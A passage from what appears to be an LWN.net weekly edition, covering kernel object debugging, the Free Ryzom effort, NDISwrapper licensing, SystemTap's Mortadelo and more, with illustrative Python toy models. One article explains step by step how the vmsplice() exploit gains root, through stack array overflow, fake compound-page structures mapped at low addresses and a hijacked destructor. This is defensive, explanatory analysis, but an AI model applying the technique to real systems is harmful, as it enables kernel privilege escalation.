kinds of problems in the future.  It is highly unlikely that we have seen
the last security problem in the Gecko engine, so reducing the cascade that
results from finding one would be welcome.


Because of problems with the ABI changing in the past, Fedora chooses to
make the applications' library version number exactly track the Mozilla release number.
Some other distributions do not do that, so unless the ABI does change, they do
not need to update each package that uses the libraries.  This has some
advantages, but could lead to broken applications if an ABI change goes
unnoticed. 


We have also seen similar cascades of updates, most notably from the xpdf PDF viewer.  Unlike
Gecko, there is no library for xpdf, leading multiple applications to
include its source in their own.  When a flaw is found, several different
applications (cups, gpdf, etc.) across all distributions need to
be updated immediately, leading to an effect similar to that seen with the
Gecko vulnerabilities.  Hopefully, over time, the development of the poppler library will mitigate
this problem somewhat.

 There are lots of good reasons to separate code into components where
possible, but security is an important one. Creating and maintaining an ABI
is sometimes difficult, but generally worth the trouble. Imagine the chaos
that could result from a security vulnerability requiring an ABI change in
glibc.  

		An object debugging infrastructure


Thomas Gleixner has discovered that being the maintainer of a core kernel
infrastructure module can bring some special challenges.  Whenever
somebody's kernel oopses in the timer code, for example, Thomas tends to
hear about it.  The only problem is that the timer code is almost never
where the bug is.  Instead, it's far more likely that some other kernel
subsystem has corrupted an active timer, leaving a bomb that will only
explode later, in the timer code, when that timer is set to expire.  At
that point, it can be hard to figure out where the real problem is, as the
culprit will be long gone.


In response, Thomas developed some special-purpose code aimed at finding
the real source of timer-related problems, preferably before it brings down
the kernel.  He has now generalized that code and posted it as the object debugging infrastructure
patch, which was subsequently significantly revised.  As this
code develops, it has the potential to help find whole classes of
especially difficult bugs before they bring the system down.  

There are a few steps involved in adding support for object debugging to a
new subsystem.  The first is to create and populate a
debug_obj_descr structure (defined in
<linux/debugobjects.h>):


The name field is the name of the subsystem; it is used in
debugging output.  We will return to the other fields below.

The next step is to call into the object debugging code whenever an action
of interest involves one of the tracked objects.  There is a set of
functions used for this purpose:


In each case, addr is a pointer to the object being operated on,
and descr is a pointer to the debug_obj_descr structure
mentioned above.  The meaning of each call is:


 debug_object_init(): the object is being initialized.

 debug_object_activate(): it is being added to a subsystem list.  For 
     timer debugging, this action happens when add_timer() is
     called.

 debug_object_deactivate(): the object is being removed from a subsystem
     list.

 debug_object_destroy(): the object is being destroyed and is
     no longer referenced within the subsystem.  This call is not 
     used in the version 2 patch set.

 debug_object_free(): the object is being freed.


The debugging code maintains a hashed set of lists for tracking objects;
each object is added to the appropriate list when one of the above calls is
made.  As actions are performed on the objects, their state is tracked.  
In this way, the debugging code
is able to test for a number of common mistakes, including deactivating an
object which is not active, reinitializing active objects, or adding
objects twice.
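
The sort of state tracking described here can be sketched in user-space
Python.  This is a toy model rather than anything taken from the patch:
the state names, the class, and the warning strings are all invented for
illustration, objects are represented by plain integer "addresses," and a
dictionary per hash bucket stands in for each of the hashed lists.

```python
from enum import Enum


class State(Enum):
    # Hypothetical state names for this sketch
    INIT = 1
    ACTIVE = 2
    INACTIVE = 3


class ObjectTracker:
    def __init__(self, nbuckets=8):
        # One dictionary per hash bucket, mapping address -> State
        self.buckets = [{} for _ in range(nbuckets)]
        self.warnings = []

    def _bucket(self, addr):
        return self.buckets[addr % len(self.buckets)]

    def _warn(self, message, addr):
        # The kernel code would send a backtrace to the logs here
        self.warnings.append(f"{message}: {addr:#x}")

    def init(self, addr):
        bucket = self._bucket(addr)
        if bucket.get(addr) is State.ACTIVE:
            self._warn("reinitializing active object", addr)
            return
        bucket[addr] = State.INIT

    def activate(self, addr):
        bucket = self._bucket(addr)
        if bucket.get(addr) is State.ACTIVE:
            self._warn("object added twice", addr)
            return
        bucket[addr] = State.ACTIVE

    def deactivate(self, addr):
        bucket = self._bucket(addr)
        if bucket.get(addr) is not State.ACTIVE:
            self._warn("deactivating inactive object", addr)
            return
        bucket[addr] = State.INACTIVE


tracker = ObjectTracker()
tracker.init(0x1000)
tracker.activate(0x1000)
tracker.activate(0x1000)     # mistake: added twice
tracker.init(0x1000)         # mistake: reinitialized while active
tracker.deactivate(0x2000)   # mistake: was never active
print(tracker.warnings)
```

Each of the three mistakes is caught at the point where it is made, which
is the whole purpose of the exercise.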


When something goes wrong, a backtrace is sent to the system logs.  Since
this backtrace identifies where the original error is made, it is likely to
be far more useful than the trace associated with the system crash which
will probably come later.  But this infrastructure can also help to make
that crash less likely, in that each subsystem can register a set of "fixup
functions."  These, of course, are all the methods in the
debug_obj_descr structure which we glossed over above.


For example, if a call to debug_object_init() is made with an
object which has already been activated, the debugging infrastructure will
respond with a call to the fixup_init() callback, passing in the
object in question and its current state (ODEBUG_STATE_ACTIVE in
this case).  The callback should return zero if it is able to,
somehow, repair the damage.  Even if things cannot be truly fixed, though,
there is still use for this function; the timer code, for example, will
disable an active timer if the calling code mishandles it.  The kernel will
almost certainly not operate as expected, but, at least, it has a smaller
chance of crashing at some random time in the future.
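
As a rough illustration of how such a callback might behave, here is a toy
user-space model in Python.  Nothing here is the kernel's code: ToyTimer,
toy_debug_object_init() and the "init" state value are hypothetical, only
the ODEBUG_STATE_ACTIVE name comes from the patch, and the return
convention (zero meaning "repaired") simply follows the description above.

```python
ODEBUG_STATE_INIT = "init"        # hypothetical value for this sketch
ODEBUG_STATE_ACTIVE = "active"    # state name from the text; the value is arbitrary


class ToyTimer:
    def __init__(self):
        self.pending = False


def timer_fixup_init(timer, state):
    """Try to repair an init-while-active mistake; return 0 on success."""
    if state == ODEBUG_STATE_ACTIVE:
        timer.pending = False     # disable the timer so it cannot fire later
        return 0
    return 1                      # nothing this callback knows how to fix


def toy_debug_object_init(obj, states, fixup_init, log):
    """Toy stand-in for debug_object_init(); states maps id(obj) -> state."""
    state = states.get(id(obj))
    if state == ODEBUG_STATE_ACTIVE:
        log.append("init of active object")   # the kernel would log a backtrace
        if fixup_init(obj, state) != 0:
            return                            # not repaired; leave the state alone
    states[id(obj)] = ODEBUG_STATE_INIT


timer = ToyTimer()
timer.pending = True
states = {id(timer): ODEBUG_STATE_ACTIVE}
log = []
toy_debug_object_init(timer, states, timer_fixup_init, log)
print(timer.pending, states[id(timer)], log)
```

The mistake is still reported, but the timer is no longer armed, so the
later explosion in the timer code does not happen.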

Most debugging checks are performed in response to calls from within the
subsystem itself.  There is one useful check which cannot be done that way,
though: detecting the freeing of objects which are still under some sort of
subsystem management.  To catch that mistake, Thomas's patch inserts a hook
into functions like kfree() and free_hot_cold_page().
Every time an object is freed, the code checks through the appropriate list
to see if it is still seen as being active in some subsystem.
Freeing an object which is still known to a subsystem is almost always a
bug - one which can be hard to track down later on.
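
A minimal sketch of the idea, again as a user-space Python toy with
invented names, might look like the following.  It assumes that the check
covers the whole freed range, since a tracked object (a timer, say) may be
embedded inside a larger allocated structure; that detail is an assumption
of this sketch, not something stated above.

```python
class FreeChecker:
    def __init__(self):
        self.active = {}     # address -> name of the owning subsystem
        self.reports = []

    def activate(self, addr, subsystem):
        self.active[addr] = subsystem

    def deactivate(self, addr):
        self.active.pop(addr, None)

    def checked_free(self, start, size):
        """Model of a hooked free; returns True if the free looks safe."""
        hits = sorted(a for a in self.active if start <= a < start + size)
        for addr in hits:
            self.reports.append(
                f"freeing active {self.active[addr]} object at {addr:#x}")
        return not hits


checker = FreeChecker()
checker.activate(0x1010, "timer")        # a timer embedded in a larger structure
print(checker.checked_free(0x1000, 0x40))
print(checker.reports)
checker.deactivate(0x1010)
print(checker.checked_free(0x1000, 0x40))
```

This toy scans every tracked object on each free, which overstates the
cost of a hashed lookup but does show why the check is not free.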

The check on freed memory objects is clearly a useful debugging tool.  It could also have a
nontrivial overhead, though, since it requires searching a list every time
some memory is freed.  So it has its own configuration option and can be
configured out of the kernel, even if the rest of the debugging code is
built in.

At this point, only the timer subsystem is covered by this infrastructure,
but there are plenty of other obvious candidates.  Perhaps at the top of the
list would be kobjects, which are famously susceptible to all kinds
of programming mistakes.  So expect to see the coverage of this code grow
in the near future.

		Ryzom returns?


Toward the end of 2006, a company called Nevrax went out of business.
Nevrax was the operator of an online multiplayer game called Ryzom which
had developed a dedicated (if insufficiently lucrative) following.  A group
of free software developers, former Nevrax employees, and assorted Ryzom players sensed an
opportunity here: perhaps the source for Ryzom could be obtained from the
failing company and turned into free software.  It seemed like a winning
solution for all sides: Nevrax's creditors could get whatever money could
be raised for the code, Ryzom players would continue to have a game, and
the free software community would get an extensive new code base.  All that
was needed was to convince the relevant bankruptcy court that this was a
good idea.


To that end, the Free Ryzom project raised some €170,000 in pledges -
an impressive amount of money.  The Free Software Foundation offered
$60,000 toward this goal.  But, in court, another suitor (Gameforge) won
out with a plan to keep the game proprietary.  The Free Ryzom folks became
the Virtual Citizenship Association and faded from view; it seemed that
this story was done.


Only it seems it's not done.  In February, the project sent out a news update on
what had been happening over the past year.  It seems that Gameforge
stopped paying its employees in June, 2007, and, by August, was not paying
its creditors.  In October, Gameforge France went back into the bankruptcy
process; then, last February, the Ryzom servers were shut down.  This
particular plan to save Ryzom, it seems, was not as successful as one might
have liked.


So it seems that the Ryzom source might, once again, be up for grabs.  A news update
suggests that the process is moving quickly, but the project could make a
try for the code if it is able to come up with a large (at least
€230,000) bid in the immediate future.  As of this writing, the Free
Ryzom folks are examining their options and trying to come to a decision on
the best course to take.


There can be no doubt that this code would be a valuable acquisition.
Despite the fact that some of the very first multiplayer online games were
free software (consider Netrek, for example, which occupied rather too much
of your editor's time some 15 years ago, or some of the early MUD and MOO
systems), free software does not have much to offer in that area now.  The
lack of competitive offerings in this area is one of the biggest
motivations for people to use Windows.  A free Ryzom could be a strong step
toward better online gaming with free software.




That said, one has to wonder why we, the larger free software community,
seem to be unable to put together a competitive game without relying on a
huge infusion of source from the proprietary world.  There are certainly
projects out there; consider Battle for
Wesnoth or WorldForge, for
example.  Wesnoth is an addictive game with basic multiplayer capability
and an active developer community, but it is a turn-by-turn game with
relatively rudimentary graphics - though the graphics and soundtracks are
quite nice by free software standards.  WorldForge has high ambitions and a
lot of infrastructure, but it never really seems to get out of that
pre-alpha state.  A look at WorldForge's CVS
logs suggests that very few developers are actively contributing to the
project.


There are critics of the free software community who would argue that
games are the sort of program that free software just cannot do as well as
proprietary software.  A certain amount of planning and direction is
required to pull together a coherent virtual world, quite a bit of artistic
work (artwork, sounds, etc.) is required, and so on; a project without a
business-based revenue stream just cannot compete in this area.  There
might be some truth to this claim - but not that much.  When one looks at
all that we have accomplished, it does not seem like an online multiplayer
game - challenging though it might be - should be
beyond our capabilities.


What seems more likely is that we just haven't gotten the project
management right yet.  Anybody who has hung around with people who are
interested in computing knows that game playing is certainly an itch that
many feel the need to scratch.  We just haven't yet made it easy enough for
that scratching to happen.


What's needed is a relatively simple core upon which people
can easily create virtual worlds.  It should be straightforward for people
who are not developers - artists, musicians, script writers - to contribute
to the system, and their contributions should be made welcome.  The desktop
projects have had a certain amount of success in bringing in non-developer
contributors; a look at how they have done that could be worthwhile.


Arguably, we should have most of the pieces we need.  Battle for
Wesnoth has shown that it's possible to put together a community which goes
beyond just software developers.  WorldForge seems to have a good start on
some important pieces of infrastructure.  There may be some useful code to
be had from the Second Life client, which has been free for a year now.  We
are a large and talented community; we certainly have the ability to do
something interesting in this area.  It should not be necessary to wait
until we get a code dump from a dead proprietary software company.

		The rest of the vmsplice() exploit story


Back in February, LWN published a
discussion of the vmsplice() exploit which showed how the
failure to check permissions for a read operation led to a buffer overflow
within the kernel.  Subsequently, a linux-kernel reader pointed out that the article
stopped short of a complete explanation: this is not an ordinary buffer
overflow exploit.  Travel schedules and such prevented the writing of an
immediate followup, but your editor would still like to tell the full
story.  So this article picks up where the last one left off and describes
how the vmsplice() exploit makes use of this buffer overflow to
take over the system.

When vmsplice() is being used to feed data from memory into a
pipe, the function charged with making it all happen is
vmsplice_to_pipe(), found in fs/splice.c.  It declares a
couple of arrays of interest:


PIPE_BUFFERS, remember, is 16 on exploitable configurations.  Both
of these arrays are passed into get_iovec_page_array(), which, as
described in the previous article, makes a call to
get_user_pages() to fill in the pages array.  As a result
of the failure to check whether the calling application is allowed to read
the requested region of memory, get_user_pages() will overflow the
pages array, writing far more than PIPE_BUFFERS pointers
into it.  These are, however, pointers to legitimate kernel data
structures; it remains to be seen how this overflow enables the attacker to
take control of the system.

The partial array is also passed into
get_iovec_page_array(); it describes the portion of each page which
should be written into the pipe.  To that end, a loop like this is run
immediately after returning from get_user_pages():


Since full pages are being written in this case, the calculated offset will be zero, and the length
will be PAGE_SIZE (4096).  The value of error is the
return value from get_user_pages(); that will be the number of
pages actually mapped: 46, in the case of the exploit.  Remember that the
partial array is also dimensioned to hold 16 entries, so this loop
will overflow that array as well.

Both of these arrays are declared, one right after the other, in
vmsplice_to_pipe().  A quick test by your editor suggests that the
partial array will be placed below pages in memory, so,
once partial is overflowed, the loop will start overwriting
pages instead.  So the pages array will end up containing
alternating values of zero and 4096 rather than the real struct
page pointers it had before.  (It's worth noting that the exploit
still works if the arrays are placed in the opposite order, since the
overflow causes code down the line to think that pages is larger
than it really is).
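
The double overflow is easier to follow with a toy model.  The sketch
below is not kernel code: it is a Python simulation which treats the stack
frame as a flat list of words, assumes that each partial entry
occupies two words (offset and length), and places pages
immediately above partial as described above.  The function name
and the string stand-ins for page pointers are inventions for the sake of
illustration.

```python
PIPE_BUFFERS = 16        # declared size of both arrays
PAGE_SIZE = 4096
WORDS_PER_PARTIAL = 2    # assumption: each partial[] entry is (offset, len)


def pages_after_overflow(pages_mapped):
    """Return the contents of pages[] once the partial[] loop has finished."""
    pages_base = PIPE_BUFFERS * WORDS_PER_PARTIAL   # pages[] sits just above partial[]
    frame_words = max(pages_mapped * WORDS_PER_PARTIAL, pages_base + PIPE_BUFFERS)
    stack = [None] * frame_words                    # flat model of the stack frame

    # get_user_pages() has stored page pointers (modelled here as strings).
    for i in range(PIPE_BUFFERS):
        stack[pages_base + i] = f"struct page #{i}"

    # The loop runs once per mapped page, with no check against PIPE_BUFFERS.
    for i in range(pages_mapped):
        stack[i * WORDS_PER_PARTIAL] = 0                 # partial[i].offset
        stack[i * WORDS_PER_PARTIAL + 1] = PAGE_SIZE     # partial[i].len

    return stack[pages_base:pages_base + PIPE_BUFFERS]
```

With 16 mapped pages the pointers survive; with the exploit's 46, every
slot in the modelled pages array ends up holding either zero or
4096.  The model only tracks the first 16 page pointers and ignores
whatever else lives on the real stack.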

Once all this has happened, control returns to vmsplice_to_pipe()
- the overflow is not big enough to have overwritten the return address.  A
call to splice_to_pipe() is supposed to finish the job, but
something interesting happens there.  Toward the beginning of this
function, this test is made:


Looking back at the exploit
code, we see that it closes the read side of the pipe before calling
vmsplice().  So splice_to_pipe() will quit almost
immediately.  On its way out, however, it does this:


The call to get_user_pages() will have locked each of the relevant
pages into memory to allow the kernel to work with them; this is the
cleanup code which goes back and unlocks the pages which will not be used.
But remember that the pointers in the pages array have been
overwritten, and are now either zero or 4096.  What would normally happen
here is a kernel oops, since those are not legitimate addresses.  The
exploit code has done something tricky, though: using some special
mmap() calls, it has created some anonymous memory at the bottom
of its address space.  


Directly dereferencing user-space addresses while running in kernel mode is
frowned upon for a number of reasons; it can blow up in a number of ways.
But, if the address is valid and the relevant page is resident in memory,
direct access to user-space memory will work.  So, when the kernel starts
to work with the addresses that it thinks are struct page
pointers, it does not get any sort of fault; instead, it gets the data
placed in that memory by the exploit.  Needless to say, that data has been
arranged carefully.


The Linux kernel normally manages each page as an independent object.
There are times, however, when pages are grouped into larger units, called
"compound pages."  This generally happens when physically contiguous
allocations larger than one page are needed by the kernel; when this
happens, a compound page is passed back to the caller.  These pages are
special in that they must be split back apart when they are released back
into the system, and there may be other cleanup work to do.  So
compound pages have an attribute not found on normal pages: a destructor
which is called when the page is freed.

So, if we look at how the exploit sets up its low-memory page
structures, we see:


When the kernel looks for a page structure at user-space address
zero, it will find something which looks like a compound page.  The
destructor (stored in the lru.next field of the second
page structure) is set to kernel_code(), a function
defined within the exploit itself.  Since the count is set to one,
the call to page_cache_release() (which decrements that count)
will conclude that there are no further references and, since the page looks like
a compound page, the destructor will be called.  At this point, the exploit
has arbitrary code running in kernel mode, and the show is truly over.
This code just sets the process's uid to zero (giving it root
access), then engages in some assembly-language trickery to return
immediately to user space, shorting out the rest of the cleanup process. 
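
The chain of events can be sketched in a few lines of Python.  This is a
deliberately simplified model, not the kernel's page-release code: the
FakePage class, the PG_COMPOUND value, the dictionary standing in for
mapped user-space memory, and the helper names are all assumptions made
for illustration.  Only the overall shape (count drops to zero, page looks
compound, destructor from the second structure is called) comes from the
description above.

```python
PG_COMPOUND = 0x1   # hypothetical flag value for this model


class FakePage:
    """Just the fields of a page structure that matter here."""

    def __init__(self, flags=0, count=0, private=None, lru_next=None):
        self.flags = flags
        self.count = count
        self.private = private      # for a compound page: its head page
        self.lru_next = lru_next    # in the second structure: the destructor


def release_page(user_memory, pointer):
    """Toy version of dropping one reference through a 'struct page' pointer."""
    if pointer not in user_memory:
        # Nothing mapped there: this is the oops that would normally happen.
        raise MemoryError("oops: nothing mapped at %#x" % pointer)
    first, second = user_memory[pointer]
    if not first.flags & PG_COMPOUND:
        first.count -= 1
        return None
    head = first.private
    head.count -= 1
    if head.count == 0:
        # No references left on a compound page: call its destructor.
        return second.lru_next(head)
    return None


def build_fake_pages(destructor):
    """What the exploit arranges at a low address: two adjacent structures."""
    first = FakePage(flags=PG_COMPOUND, count=1)
    first.private = first
    second = FakePage(lru_next=destructor)
    return first, second
```

Mapping such a pair at both address zero and address 4096 means that any
of the overwritten pointers leads to the attacker's destructor rather than
to a fault.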


There are a couple of interesting implications from all of this.  One, clearly,
is that this exploit is not something which was bashed out by a script
kiddie somewhere.  It was written by somebody who understands low-level
kernel code quite well and who is able to use that understanding to
escalate an apparent information-disclosure vulnerability into a full code
execution problem.  It is, clearly, a mistake to underestimate those who
write exploits, not all of whom immediately make their works known to the
development community.  One also should not assume that they have not
already written exploits for other, still unfixed bugs.


Also worth noting is the fact that ordinary buffer overflow protection may
well not have been effective against this vulnerability.  The return address on
the stack was not overwritten, and no exploit code was put in data areas.
This episode has caused a renewed interest in technical security measures
in the kernel.  These measures are good, but it would be a mistake to think
that they will fix the problem.  What is really needed is stronger review
of patches with security in mind; it is not yet clear to your editor that
this review is happening.

		The GNOME Foundation launches an accessibility outreach program


The GNOME Foundation has announced a new outreach program for the GNOME
accessibility project:


The GNOME Foundation is running an accessibility outreach program, offering US$50,000 to be split among individuals. This program will promote software accessibility awareness among the GNOME and broader Free Software communities, as well as harden and improve the overall quality of the GNOME accessibility offering.
The program is sponsored by GNOME Foundation, Mozilla Foundation, Google's Open Source Program Office, Canonical, and Novell. 


Applications opened for review on March 1, and
the project closes on December 31.  Acceptance of long-term tasks
closes on October 1; short-term task acceptance closes on December 15.
The goal of the program is to work on improving shortcomings in the
existing GNOME accessibility system.
There is an aim to increase awareness of accessibility-related issues,
encourage developers to work on accessibility issues and
generally improve accessibility in free software.


From the project announcement:
"There will be two tracks to the program: In the first track accepted individuals will work towards accomplishing one of the major projects nominated for the program, earning US$6,000 and can take up to six months to complete the task. The second track will reward contributors US$1,000 for fixing five bugs out of a pool of accessibility bugs nominated by the program judges."

The program rules explain the contract that the developers will
work under, the process of claiming tasks, the judging process
and more.
A list of tasks has been announced:
"Are you a developer who wants to become more familiar with accessibility? Are you an artist that can draw? Maybe you might also be interested in becoming a module maintainer some day. A great way to get started is by fixing bugs, and we're offering you a way to get paid to do it. :-)"


The list of long-term tasks includes:

Writing and updating accessibility documentation.
Improving accessibility support in the Evince document viewer.
Adding and improving GNOME magnification support.
Building an accessibility testing framework.
Adding new participant-defined accessibility projects.


Developers who need some income and are willing to improve
availability of GNOME to all should consider taking on a task.


		NDISwrapper dodges another bullet


Hardware compatibility has long been a problem for Linux—though it has
gotten much better over the years—so it will be surprising to some to
see a kernel change that will make some hardware cease working.  For
others, who follow kernel development a bit more closely, it will come as
no great surprise that NDISwrapper was
disabled by a change made to the kernel back in January.  NDISwrapper has
never been very popular with kernel hackers, but, because it is GPL
licensed and allows more hardware to be used, there are folks on both sides
of the argument.  For a while, it looked like NDISwrapper had lost that
argument, but the 2.6.25-rc4 release restores the functionality it requires.


NDISwrapper is a kernel module that is used to load Windows-only drivers
into Linux.  For some hardware, notably wireless network cards, it is the
only way to support them because the manufacturer provides neither
specifications nor a working Linux driver.  Unfortunately, many of these
cards are installed in laptops where it is difficult or impossible to
replace them with Linux-friendly alternatives.  This is what led to
implementing the Network Device Interface Specification
(NDIS) for Linux.  NDIS is an ancient interface for networking devices; it
was originally developed by Microsoft and 3Com for MS-DOS in the mid to
late 1980s and is still in use today.


The NDISwrapper code has been around since 2003, but always as a separate
module that must be built by the user (or distribution) and loaded into the
kernel.  It is not part of the mainline kernel, nor will it ever be;
maintaining a glue layer that allows proprietary, closed-source drivers to
be linked into the kernel is not high on anyone's list.  But NDISwrapper
is GPL.  Its code is available for inspection or modification by
all, so that is not the problem; it is the intent that matters.


When a binary-only driver—the NVidia video driver for example—is loaded into the kernel, a "taint" flag is set,
indicating that the kernel is tainted by code that cannot be examined.  Bug
reports for tainted kernels are routinely ignored, unless they can be
reproduced in an untainted kernel.  Life, it seems, is too short to try and
diagnose problems that could easily have been created by a buggy driver
that cannot be debugged.  Originally, the taint flag was just a means to
detect and ignore those bug reports, but over time it has become part of a
mechanism to restrict which symbols a module can access.


Some kernel symbols are considered so integral that any module using them
must be a derivative work.  Therefore, modules that want to use them must
be GPL. Modules declare their license using the MODULE_LICENSE
macro, while symbols are exported using either EXPORT_SYMBOL or
EXPORT_SYMBOL_GPL.   Any module that doesn't have a compatible
license doesn't get access to the GPL-only symbols. 
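
The gating rule itself is simple enough to model.  The following Python
sketch is only an illustration of the idea, not the kernel's module
loader: the symbol names are hypothetical, and the set of license strings
is an illustrative subset rather than the kernel's full list.

```python
# Illustrative subset of license strings treated as GPL-compatible.
GPL_COMPATIBLE_LICENSES = {"GPL", "GPL v2", "Dual BSD/GPL"}

# Hypothetical export table: symbol name -> True if exported GPL-only
# (EXPORT_SYMBOL_GPL), False if exported to everybody (EXPORT_SYMBOL).
EXPORTS = {
    "generic_helper": False,
    "core_internal_helper": True,
}


def can_link(module_license, symbol):
    """Would a module declaring this license be given access to the symbol?"""
    gpl_only = EXPORTS[symbol]      # KeyError: the symbol is not exported at all
    if not gpl_only:
        return True
    return module_license in GPL_COMPATIBLE_LICENSES
```

A module declaring "Proprietary" can still use generic_helper in
this model, but is refused core_internal_helper.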


Few would argue for a GPL module which existed to re-export all of the
GPL-only symbols to non-GPL modules. But that is not what NDISwrapper does;
instead it implements NDIS, but in order to do that, needs access to
GPL-only symbols, mostly for USB and workqueue interfaces.  It would be
hard to contend that NDIS drivers are derivative of the Linux kernel; they
were written for an entirely different system using an interface that predates Linux.  This is why NDISwrapper developers
and users think that an exception should be made for it.  Clearly the
Windows drivers taint the kernel, but accessing a subset of the GPL-only
functionality through NDISwrapper should be allowed, they argue.

Since NDISwrapper itself is GPL, the normal module loading rules would
allow it to access GPL-only symbols, except that an explicit check for
NDISwrapper was added to the 2.6.16 kernel.  The question, then, revolves
around what should be done when the kernel detects it being loaded.
NDISwrapper has always been careful to mark the drivers that it loads as
tainted, but the recent patch marks the module itself as tainted,
disallowing access to the GPL-only symbols and breaking NDISwrapper. Absent
that patch, only the kernel is marked as tainted—the module itself is
not.  
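
The difference between the two behaviors comes down to which taint flag
gets set when the name check fires.  The sketch below models that
distinction in Python; it is a hypothetical simplification (the function
and its parameter are inventions for illustration), not the code in the
kernel's module loader.

```python
def load_module(name, taint_module_on_match):
    """Model loading a GPL-licensed module; return the resulting state."""
    kernel_tainted = False
    module_tainted = False
    if name == "ndiswrapper":            # the explicit name check
        kernel_tainted = True
        if taint_module_on_match:        # behavior with the recent patch
            module_tainted = True
    return {
        "kernel_tainted": kernel_tainted,
        "module_tainted": module_tainted,
        # A tainted module is refused the GPL-only symbols.
        "gpl_only_symbols": not module_tainted,
    }
```

In this model, the stricter setting leaves NDISwrapper without the
GPL-only symbols it needs, while the older behavior taints only the
kernel.  Since the check is keyed on the module's name, a module loaded
under any other name passes through untouched in either case.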

A similar situation occurred back in October 2006, which LWN covered on the Kernel page, when
a stricter interpretation of tainting started to be enforced.  At that
point, NDISwrapper stopped working and it looked like it might stay that
way, until Andrew Morton stepped in with objections to breaking NDISwrapper with no warning.  Shortly
thereafter, a patch was merged that only marked the kernel as tainted when
NDISwrapper is loaded.  At
that point, the issue fell by the wayside, until now.


Part of the problem is that marking a symbol as GPL-only means different
things to different developers.  For some, it is a means to warn
proprietary driver developers that they are straying into territory that
makes distribution of their drivers very likely to be a violation of the GPL, while others
want to use it to completely eliminate binary-only kernel drivers.  There
is no policy that clearly delineates which interpretation is "correct".  Meanwhile,
NDISwrapper has been in use by many for four years or more; breaking it
now, with little or no warning, is likely to create some very unhappy users.


Linus Torvalds clearly thinks there are no licensing issues with NDISwrapper:

Quite frankly, my position on this has always been that the GPLv2 
explicitly covers _derived_ works only, and that very obviously a Windows 
driver isn't a derived work of the kernel. So as far as I'm concerned, 
ndiswrapper may be distasteful from a technical and support angle, but not 
against the license.


Jon Masters, the author of the patch that
inadvertently made this change, had an excellent suggestion that should
be pursued to try and reduce these kinds of problems in the future:

Since we've brought it up, one good thing I would like to see come of
this perhaps is a clearer understanding of what the kernel should and
should not be doing in terms of "license compliance enforcement". We
have had lots of talk, but perhaps a "policy" document is worthwhile.


Another interesting battle will be that surrounding exporting
init_mm() which was removed in early versions of 2.6.25, but
then restored in 2.6.25-rc4.  It is fairly clearly a low-level kernel
interface that is unused by any in-tree driver, so its export was removed.
One rather glaring exception is that the out-of-tree NVidia binary drivers do
use it.  Its export has been restored for one more development cycle, but it is clearly seen as
something that should not be touched by drivers.  It could be quite a
struggle between the developers and users of a very popular driver and the kernel hackers
that don't want to see kernel API abuse.  


Issues surrounding the GPL are always contentious on linux-kernel; this one
is no different.  While NDISwrapper is an out-of-tree driver, it has hardly
been invisible, so complaints when it breaks should come as no surprise.
A simple renaming will avoid the current kernel check, so breaking it that
way will mostly be
an annoyance to users rather than a real barrier to its use.  Since there
is no real consensus amongst kernel hackers on the binary driver issue, it is hard to see one
emerging with regards to NDISwrapper, but that would be the best outcome.
One way or another, it needs to be decided; NDISwrapper shouldn't come
under a periodic threat of breaking.  If it is determined to be a violation
of the kernel interfaces, that should be clearly indicated and its users should be given some
warning so they can find alternatives.


		File monitoring with Mortadelo and SystemTap


SystemTap is a tool to help gather information about running Linux systems
which has been available for some time now.  But applications that use the tool
have been few and far between.  Mortadelo is a
GUI tool that uses SystemTap to observe and record system calls.  It is
more of a proof-of-concept than a complete application—though it is
useful in its current form—but it does start
to show some of the things that can be done using SystemTap.


Mortadelo specifically intercepts system calls that deal with accessing
files, collecting the arguments to the calls as well as the return codes.  It
is patterned after the Windows Filemon program, which is used in much the
same way that a Linux user might use strace—only with a GUI.
Problems with permissions or files that do not exist are the kinds of
things that Mortadelo could be used to diagnose.


The data collected is displayed in a list in the GUI (shown at left),
which can then be filtered using regular expressions to pull out the
information of interest.  Because it uses SystemTap, Mortadelo gathers
information from all running processes at once, allowing the user to choose
which parts they are interested in.  The filtering is
somewhat primitive, in that particular fields cannot be chosen to filter
on, but still useful because it searches each entry fully.  


System calls that return an error are highlighted in red, making it easy to
pick them out.  By choosing appropriate strings to filter on, all
permission errors in the system or every access of a particular filename
can be seen.  The GUI allows one to start and stop the recording as well as
to save the captured data to a file.  Each entry includes a timestamp,
the process name and pid, the system call, return code, and arguments.
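
The whole-entry filtering is easy to picture in code.  This Python sketch
is not taken from Mortadelo (which is written in C#); the Entry class and
its field layout are assumptions based on the fields listed above, and a
negative return code is assumed to mean an error.

```python
import re
from dataclasses import dataclass


@dataclass
class Entry:
    timestamp: str
    process: str
    pid: int
    syscall: str
    result: int
    arguments: str

    def as_text(self):
        """The whole entry as one string; filters search all of it."""
        return (f"{self.timestamp} {self.process} {self.pid} "
                f"{self.syscall} {self.result} {self.arguments}")

    def is_error(self):
        """Entries like this would be the ones highlighted in red."""
        return self.result < 0


def filter_entries(entries, pattern):
    """Keep the entries whose full text matches the regular expression."""
    regex = re.compile(pattern)
    return [entry for entry in entries if regex.search(entry.as_text())]
```

Because the pattern is matched against the entire entry, a filter such as
"passwd" will catch both a process named passwd and any access to
/etc/passwd; that is the price of not being able to select a field.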


The application is written in C#, using the Mono framework; one of the authors
has an interesting weblog entry comparing Mono
and Python for developing this kind of tool.  Mortadelo's interface to
SystemTap is fairly straightforward: it spawns a stap command and
sends it the probe points and code via stdin.  It then reads the
stap output, parsing it and displaying it in the window.
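
The same pattern can be sketched in Python.  What follows is not
Mortadelo's code: the probe script is illustrative and untested, the
"|"-separated output format is an assumption chosen to make parsing easy,
and the function names are hypothetical.  Running stap with "-" as the
script name tells it to read the script from standard input.

```python
import subprocess

# Illustrative probe script; the output format is this sketch's own choice.
SCRIPT = r'''
probe syscall.open.return {
    printf("%d|%s|%d|%s|%s\n", gettimeofday_us(), execname(), pid(), name, retstr)
}
'''


def parse_line(line):
    """Split one line of (assumed) stap output into its fields."""
    timestamp, process, pid, syscall, result = line.rstrip("\n").split("|", 4)
    return {
        "timestamp": int(timestamp),
        "process": process,
        "pid": int(pid),
        "syscall": syscall,
        "result": result,
    }


def run_probe(script=SCRIPT, command=("stap", "-")):
    """Spawn stap, feed it the script on stdin, and yield parsed entries."""
    with subprocess.Popen(list(command), stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE, text=True) as proc:
        proc.stdin.write(script)
        proc.stdin.close()              # end of script: stap can start working
        for line in proc.stdout:
            yield parse_line(line)
```

A GUI would consume run_probe() from a background thread and append each
entry to its list as it arrives; stap generally needs elevated privileges
to run.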


There were some tricks to getting it to build and run, but Eugene Teo's instructions
for running it on Fedora 8 were quite helpful.  Part of the
problem was in getting SystemTap going on the system, which is a problem we have mentioned
before.  There were some other small hurdles as well, but Teo's hints
and proper application of grep were enough to get past those. 
